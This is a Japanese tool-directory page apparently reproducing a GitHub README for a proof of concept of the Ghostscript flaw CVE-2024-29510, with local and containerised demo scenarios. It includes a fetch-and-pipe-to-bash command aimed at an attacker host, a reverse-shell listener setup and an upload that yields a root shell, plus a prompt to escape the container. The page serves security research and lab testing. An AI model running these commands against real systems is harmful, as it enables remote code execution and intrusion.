Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-29510 — CVE-2024-29510用のPOCコードとデモVulnApp | Kitploit
ツール/GitHubGitHub/swsmith2391/cve-2024-29510
脆弱性分析エクスプロイトウェブアプリケーション悪用ペイロード開発コンテナエスケープバイナリエクスプロイト
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

CVE-2024-29510用のPOCコードとデモVulnApp

リポジトリを見る
112年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Original research and POC code: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

注記: 実行したコマンド以外、POCには一切変更を加えていません。Codean LabsのThomas Rinsma氏による素晴らしい研究とPOCに、すべての功績は帰属します。

ローカルシナリオ

  1. ホストが脆弱かどうかを確認するチェックスクリプトをダウンロードして実行するステージャースクリプトにラップされている
  2. POC は Python3 リバースシェルをダウンロードして実行するように変更されている
  3. ステージャーとリバースシェルは STDIN 経由でダウンロードおよび実行される
  4. POC は /tmp にランダムな名前のアーティファクトを残す

攻撃者ホスト上:

  1. pwncat-cs または netcat を使用して、443 用のリスナーを作成する
  2. エクスプロイトディレクトリに移動する
  3. python3 -m http.server 80

被害者ホスト上 (Ubuntu 23.10、Ghostscript 10.01.2 実行中):

  1. ターミナルを開いて実行: export RHOST=''; wget -q http://$RHOST/run -O - | bash &

リモートシナリオ (VulnApp)

  1. 'docker build -t cve-2024-29510-demo:latest .' を使用して VulnApp をビルドする (Dockerfile ディレクトリに https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz のコピーが必要)
  2. 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest' を使用して VulnApp を実行する
  3. 機能をテストするために good.ps の変換を試す。矢印 (例: '>') を描く線が含まれるレンダリング済みPDFが返されるはずです。
  4. shell.html を配信するWebサーバーをポート80でセットアップする (例: 'python3 -m http.server 80')
  5. pwncat-cs または netcat を使用して、443 用のリスナーを作成する
  6. bad.eps をアップロードすると、VulnApp はハングし、リスナーはコンテナのリバースシェル (root として実行中) をキャッチするはずです。
  7. コンテナから脱出せよ!
ツールをダウンロード